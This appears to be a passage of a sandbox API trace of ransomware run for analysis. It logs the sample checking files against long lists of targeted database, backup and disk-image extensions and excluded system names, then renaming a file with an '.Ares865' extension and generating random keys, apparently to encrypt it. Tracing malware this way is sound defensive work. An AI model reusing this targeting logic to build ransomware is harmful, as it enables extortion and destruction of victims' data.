(lpString="adb") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.330] lstrlenW (lpString="adb") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.330] lstrlenW (lpString="ade") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="ade") returned 1 [0083.330] lstrlenW (lpString="adf") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="adf") returned 1 [0083.330] lstrlenW (lpString="adn") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="adn") returned 1 [0083.330] lstrlenW (lpString="adp") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="adp") returned 1 [0083.330] lstrlenW (lpString="alf") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="alf") returned 1 [0083.330] lstrlenW (lpString="ask") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="ask") returned 1 [0083.330] lstrlenW (lpString="btr") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="btr") returned 1 [0083.330] lstrlenW (lpString="cat") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="cat") returned 1 [0083.330] lstrlenW (lpString="cdb") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="cdb") returned 1 [0083.330] lstrlenW (lpString="ckp") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="ckp") returned 1 [0083.330] lstrlenW (lpString="cma") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="cma") returned 1 [0083.330] lstrlenW (lpString="cpd") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="cpd") returned 1 [0083.330] lstrlenW (lpString="dacpac") returned 6 [0083.330] lstrlenW (lpString="dad") returned 3 [0083.330] lstrcmpiW (lpString1="hxn", lpString2="dad") returned 1 [0083.330] lstrlenW (lpString="dadiagrams") returned 10 [0083.330] lstrlenW (lpString="daschema") returned 8 [0083.331] lstrlenW (lpString="db-journal") returned 10 [0083.331] lstrlenW (lpString="db-shm") returned 6 [0083.331] lstrlenW (lpString="db-wal") returned 6 [0083.331] lstrlenW (lpString="dbc") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dbc") returned 1 [0083.331] lstrlenW (lpString="dbs") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dbs") returned 1 [0083.331] lstrlenW (lpString="dbt") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dbt") returned 1 [0083.331] lstrlenW (lpString="dbv") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dbv") returned 1 [0083.331] lstrlenW (lpString="dbx") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dbx") returned 1 [0083.331] lstrlenW (lpString="dcb") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dcb") returned 1 [0083.331] lstrlenW (lpString="dct") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dct") returned 1 [0083.331] lstrlenW (lpString="dcx") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dcx") returned 1 [0083.331] lstrlenW (lpString="ddl") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="ddl") returned 1 [0083.331] lstrlenW (lpString="dlis") returned 4 [0083.331] lstrcmpiW (lpString1=".hxn", lpString2="dlis") returned -1 [0083.331] lstrlenW (lpString="dp1") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dp1") returned 1 [0083.331] lstrlenW (lpString="dqy") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dqy") returned 1 [0083.331] lstrlenW (lpString="dsk") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dsk") returned 1 [0083.331] lstrlenW (lpString="dsn") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dsn") returned 1 [0083.331] lstrlenW (lpString="dtsx") returned 4 [0083.331] lstrcmpiW (lpString1=".hxn", lpString2="dtsx") returned -1 [0083.331] lstrlenW (lpString="dxl") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="dxl") returned 1 [0083.331] lstrlenW (lpString="eco") returned 3 [0083.331] lstrcmpiW (lpString1="hxn", lpString2="eco") returned 1 [0083.332] lstrlenW (lpString="ecx") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="ecx") returned 1 [0083.332] lstrlenW (lpString="edb") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="edb") returned 1 [0083.332] lstrlenW (lpString="epim") returned 4 [0083.332] lstrcmpiW (lpString1=".hxn", lpString2="epim") returned -1 [0083.332] lstrlenW (lpString="fcd") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fcd") returned 1 [0083.332] lstrlenW (lpString="fdb") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fdb") returned 1 [0083.332] lstrlenW (lpString="fic") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fic") returned 1 [0083.332] lstrlenW (lpString="flexolibrary") returned 12 [0083.332] lstrlenW (lpString="fm5") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fm5") returned 1 [0083.332] lstrlenW (lpString="fmp") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fmp") returned 1 [0083.332] lstrlenW (lpString="fmp12") returned 5 [0083.332] lstrcmpiW (lpString1="x.hxn", lpString2="fmp12") returned 1 [0083.332] lstrlenW (lpString="fmpsl") returned 5 [0083.332] lstrcmpiW (lpString1="x.hxn", lpString2="fmpsl") returned 1 [0083.332] lstrlenW (lpString="fol") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fol") returned 1 [0083.332] lstrlenW (lpString="fp3") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fp3") returned 1 [0083.332] lstrlenW (lpString="fp4") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fp4") returned 1 [0083.332] lstrlenW (lpString="fp5") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fp5") returned 1 [0083.332] lstrlenW (lpString="fp7") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fp7") returned 1 [0083.332] lstrlenW (lpString="fpt") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="fpt") returned 1 [0083.332] lstrlenW (lpString="frm") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="frm") returned 1 [0083.332] lstrlenW (lpString="gdb") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="gdb") returned 1 [0083.332] lstrlenW (lpString="gdb") returned 3 [0083.332] lstrcmpiW (lpString1="hxn", lpString2="gdb") returned 1 [0083.333] lstrlenW (lpString="grdb") returned 4 [0083.333] lstrcmpiW (lpString1=".hxn", lpString2="grdb") returned -1 [0083.333] lstrlenW (lpString="gwi") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="gwi") returned 1 [0083.333] lstrlenW (lpString="hdb") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="hdb") returned 1 [0083.333] lstrlenW (lpString="his") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="his") returned 1 [0083.333] lstrlenW (lpString="ib") returned 2 [0083.333] lstrcmpiW (lpString1="xn", lpString2="ib") returned 1 [0083.333] lstrlenW (lpString="idb") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="idb") returned -1 [0083.333] lstrlenW (lpString="ihx") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="ihx") returned -1 [0083.333] lstrlenW (lpString="itdb") returned 4 [0083.333] lstrcmpiW (lpString1=".hxn", lpString2="itdb") returned -1 [0083.333] lstrlenW (lpString="itw") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="itw") returned -1 [0083.333] lstrlenW (lpString="jet") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="jet") returned -1 [0083.333] lstrlenW (lpString="jtx") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="jtx") returned -1 [0083.333] lstrlenW (lpString="kdb") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="kdb") returned -1 [0083.333] lstrlenW (lpString="kexi") returned 4 [0083.333] lstrcmpiW (lpString1=".hxn", lpString2="kexi") returned -1 [0083.333] lstrlenW (lpString="kexic") returned 5 [0083.333] lstrcmpiW (lpString1="x.hxn", lpString2="kexic") returned 1 [0083.333] lstrlenW (lpString="kexis") returned 5 [0083.333] lstrcmpiW (lpString1="x.hxn", lpString2="kexis") returned 1 [0083.333] lstrlenW (lpString="lgc") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="lgc") returned -1 [0083.333] lstrlenW (lpString="lwx") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="lwx") returned -1 [0083.333] lstrlenW (lpString="maf") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="maf") returned -1 [0083.333] lstrlenW (lpString="maq") returned 3 [0083.333] lstrcmpiW (lpString1="hxn", lpString2="maq") returned -1 [0083.334] lstrlenW (lpString="mar") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mar") returned -1 [0083.334] lstrlenW (lpString="marshal") returned 7 [0083.334] lstrlenW (lpString="mas") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mas") returned -1 [0083.334] lstrlenW (lpString="mav") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mav") returned -1 [0083.334] lstrlenW (lpString="maw") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="maw") returned -1 [0083.334] lstrlenW (lpString="mdbhtml") returned 7 [0083.334] lstrlenW (lpString="mdn") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mdn") returned -1 [0083.334] lstrlenW (lpString="mdt") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mdt") returned -1 [0083.334] lstrlenW (lpString="mfd") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mfd") returned -1 [0083.334] lstrlenW (lpString="mpd") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mpd") returned -1 [0083.334] lstrlenW (lpString="mrg") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mrg") returned -1 [0083.334] lstrlenW (lpString="mud") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mud") returned -1 [0083.334] lstrlenW (lpString="mwb") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="mwb") returned -1 [0083.334] lstrlenW (lpString="myd") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="myd") returned -1 [0083.334] lstrlenW (lpString="ndf") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="ndf") returned -1 [0083.334] lstrlenW (lpString="nnt") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="nnt") returned -1 [0083.334] lstrlenW (lpString="nrmlib") returned 6 [0083.334] lstrlenW (lpString="ns2") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="ns2") returned -1 [0083.334] lstrlenW (lpString="ns3") returned 3 [0083.334] lstrcmpiW (lpString1="hxn", lpString2="ns3") returned -1 [0083.334] lstrlenW (lpString="ns4") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="ns4") returned -1 [0083.335] lstrlenW (lpString="nsf") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="nsf") returned -1 [0083.335] lstrlenW (lpString="nv") returned 2 [0083.335] lstrcmpiW (lpString1="xn", lpString2="nv") returned 1 [0083.335] lstrlenW (lpString="nv2") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="nv2") returned -1 [0083.335] lstrlenW (lpString="nwdb") returned 4 [0083.335] lstrcmpiW (lpString1=".hxn", lpString2="nwdb") returned -1 [0083.335] lstrlenW (lpString="nyf") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="nyf") returned -1 [0083.335] lstrlenW (lpString="odb") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="odb") returned -1 [0083.335] lstrlenW (lpString="odb") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="odb") returned -1 [0083.335] lstrlenW (lpString="oqy") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="oqy") returned -1 [0083.335] lstrlenW (lpString="ora") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="ora") returned -1 [0083.335] lstrlenW (lpString="orx") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="orx") returned -1 [0083.335] lstrlenW (lpString="owc") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="owc") returned -1 [0083.335] lstrlenW (lpString="p96") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="p96") returned -1 [0083.335] lstrlenW (lpString="p97") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="p97") returned -1 [0083.335] lstrlenW (lpString="pan") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="pan") returned -1 [0083.335] lstrlenW (lpString="pdb") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="pdb") returned -1 [0083.335] lstrlenW (lpString="pdm") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="pdm") returned -1 [0083.335] lstrlenW (lpString="pnz") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="pnz") returned -1 [0083.335] lstrlenW (lpString="qry") returned 3 [0083.335] lstrcmpiW (lpString1="hxn", lpString2="qry") returned -1 [0083.336] lstrlenW (lpString="qvd") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="qvd") returned -1 [0083.336] lstrlenW (lpString="rbf") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="rbf") returned -1 [0083.336] lstrlenW (lpString="rctd") returned 4 [0083.336] lstrcmpiW (lpString1=".hxn", lpString2="rctd") returned -1 [0083.336] lstrlenW (lpString="rod") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="rod") returned -1 [0083.336] lstrlenW (lpString="rodx") returned 4 [0083.336] lstrcmpiW (lpString1=".hxn", lpString2="rodx") returned -1 [0083.336] lstrlenW (lpString="rpd") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="rpd") returned -1 [0083.336] lstrlenW (lpString="rsd") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="rsd") returned -1 [0083.336] lstrlenW (lpString="sas7bdat") returned 8 [0083.336] lstrlenW (lpString="sbf") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="sbf") returned -1 [0083.336] lstrlenW (lpString="scx") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="scx") returned -1 [0083.336] lstrlenW (lpString="sdb") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="sdb") returned -1 [0083.336] lstrlenW (lpString="sdc") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="sdc") returned -1 [0083.336] lstrlenW (lpString="sdf") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="sdf") returned -1 [0083.336] lstrlenW (lpString="sis") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="sis") returned -1 [0083.336] lstrlenW (lpString="spq") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="spq") returned -1 [0083.336] lstrlenW (lpString="te") returned 2 [0083.336] lstrcmpiW (lpString1="xn", lpString2="te") returned 1 [0083.336] lstrlenW (lpString="teacher") returned 7 [0083.336] lstrlenW (lpString="tmd") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="tmd") returned -1 [0083.336] lstrlenW (lpString="tps") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="tps") returned -1 [0083.336] lstrlenW (lpString="trc") returned 3 [0083.336] lstrcmpiW (lpString1="hxn", lpString2="trc") returned -1 [0083.337] lstrlenW (lpString="trc") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="trc") returned -1 [0083.337] lstrlenW (lpString="trm") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="trm") returned -1 [0083.337] lstrlenW (lpString="udb") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="udb") returned -1 [0083.337] lstrlenW (lpString="udl") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="udl") returned -1 [0083.337] lstrlenW (lpString="usr") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="usr") returned -1 [0083.337] lstrlenW (lpString="v12") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="v12") returned -1 [0083.337] lstrlenW (lpString="vis") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="vis") returned -1 [0083.337] lstrlenW (lpString="vpd") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="vpd") returned -1 [0083.337] lstrlenW (lpString="vvv") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="vvv") returned -1 [0083.337] lstrlenW (lpString="wdb") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="wdb") returned -1 [0083.337] lstrlenW (lpString="wmdb") returned 4 [0083.337] lstrcmpiW (lpString1=".hxn", lpString2="wmdb") returned -1 [0083.337] lstrlenW (lpString="wrk") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="wrk") returned -1 [0083.337] lstrlenW (lpString="xdb") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="xdb") returned -1 [0083.337] lstrlenW (lpString="xld") returned 3 [0083.337] lstrcmpiW (lpString1="hxn", lpString2="xld") returned -1 [0083.337] lstrlenW (lpString="xmlff") returned 5 [0083.337] lstrcmpiW (lpString1="x.hxn", lpString2="xmlff") returned -1 [0083.337] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.Ares865") returned 48 [0083.337] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.ares865"), dwFlags=0x1) returned 1 [0083.338] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.338] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=390) returned 1 [0083.338] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.339] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.339] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.340] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.340] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.340] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x490, lpName=0x0) returned 0x15c [0083.343] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x490) returned 0x190000 [0083.344] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.354] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.354] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.354] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.355] CloseHandle (hObject=0x15c) returned 1 [0083.355] CloseHandle (hObject=0x118) returned 1 [0083.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.355] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="..") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="windows") returned -1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="temp") returned -1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="boot") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="perflogs") returned -1 [0083.355] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.355] lstrlenW (lpString="MS.EXCEL.14.1033.hxn") returned 20 [0083.355] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned 40 [0083.355] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.EXCEL.14.1033.hxn" | out: lpString1="MS.EXCEL.14.1033.hxn") returned="MS.EXCEL.14.1033.hxn" [0083.355] lstrlenW (lpString="MS.EXCEL.14.1033.hxn") returned 20 [0083.355] lstrlenW (lpString="Ares865") returned 7 [0083.355] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.356] lstrlenW (lpString=".dll") returned 4 [0083.356] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".dll") returned 1 [0083.356] lstrlenW (lpString=".lnk") returned 4 [0083.356] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".lnk") returned 1 [0083.356] lstrlenW (lpString=".ini") returned 4 [0083.356] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".ini") returned 1 [0083.356] lstrlenW (lpString=".sys") returned 4 [0083.356] lstrcmpiW (lpString1="MS.EXCEL.14.1033.hxn", lpString2=".sys") returned 1 [0083.356] lstrlenW (lpString="MS.EXCEL.14.1033.hxn") returned 20 [0083.356] lstrlenW (lpString="bak") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="bak") returned 1 [0083.356] lstrlenW (lpString="ba_") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="ba_") returned 1 [0083.356] lstrlenW (lpString="dbb") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="dbb") returned 1 [0083.356] lstrlenW (lpString="vmdk") returned 4 [0083.356] lstrcmpiW (lpString1=".hxn", lpString2="vmdk") returned -1 [0083.356] lstrlenW (lpString="rar") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="rar") returned -1 [0083.356] lstrlenW (lpString="zip") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="zip") returned -1 [0083.356] lstrlenW (lpString="tgz") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="tgz") returned -1 [0083.356] lstrlenW (lpString="vbox") returned 4 [0083.356] lstrcmpiW (lpString1=".hxn", lpString2="vbox") returned -1 [0083.356] lstrlenW (lpString="vdi") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="vdi") returned -1 [0083.356] lstrlenW (lpString="vhd") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="vhd") returned -1 [0083.356] lstrlenW (lpString="vhdx") returned 4 [0083.356] lstrcmpiW (lpString1=".hxn", lpString2="vhdx") returned -1 [0083.356] lstrlenW (lpString="avhd") returned 4 [0083.356] lstrcmpiW (lpString1=".hxn", lpString2="avhd") returned -1 [0083.356] lstrlenW (lpString="db") returned 2 [0083.356] lstrcmpiW (lpString1="xn", lpString2="db") returned 1 [0083.356] lstrlenW (lpString="db2") returned 3 [0083.356] lstrcmpiW (lpString1="hxn", lpString2="db2") returned 1 [0083.356] lstrlenW (lpString="db3") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="db3") returned 1 [0083.357] lstrlenW (lpString="dbf") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="dbf") returned 1 [0083.357] lstrlenW (lpString="mdf") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="mdf") returned -1 [0083.357] lstrlenW (lpString="mdb") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="mdb") returned -1 [0083.357] lstrlenW (lpString="sql") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="sql") returned -1 [0083.357] lstrlenW (lpString="sqlite") returned 6 [0083.357] lstrcmpiW (lpString1="33.hxn", lpString2="sqlite") returned -1 [0083.357] lstrlenW (lpString="sqlite3") returned 7 [0083.357] lstrcmpiW (lpString1="033.hxn", lpString2="sqlite3") returned -1 [0083.357] lstrlenW (lpString="sqlitedb") returned 8 [0083.357] lstrcmpiW (lpString1="1033.hxn", lpString2="sqlitedb") returned -1 [0083.357] lstrlenW (lpString="xml") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="xml") returned -1 [0083.357] lstrlenW (lpString="$er") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="$er") returned 1 [0083.357] lstrlenW (lpString="4dd") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="4dd") returned 1 [0083.357] lstrlenW (lpString="4dl") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="4dl") returned 1 [0083.357] lstrlenW (lpString="^^^") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="^^^") returned 1 [0083.357] lstrlenW (lpString="abs") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="abs") returned 1 [0083.357] lstrlenW (lpString="abx") returned 3 [0083.357] lstrcmpiW (lpString1="hxn", lpString2="abx") returned 1 [0083.357] lstrlenW (lpString="accdb") returned 5 [0083.357] lstrcmpiW (lpString1="3.hxn", lpString2="accdb") returned -1 [0083.357] lstrlenW (lpString="accdc") returned 5 [0083.357] lstrcmpiW (lpString1="3.hxn", lpString2="accdc") returned -1 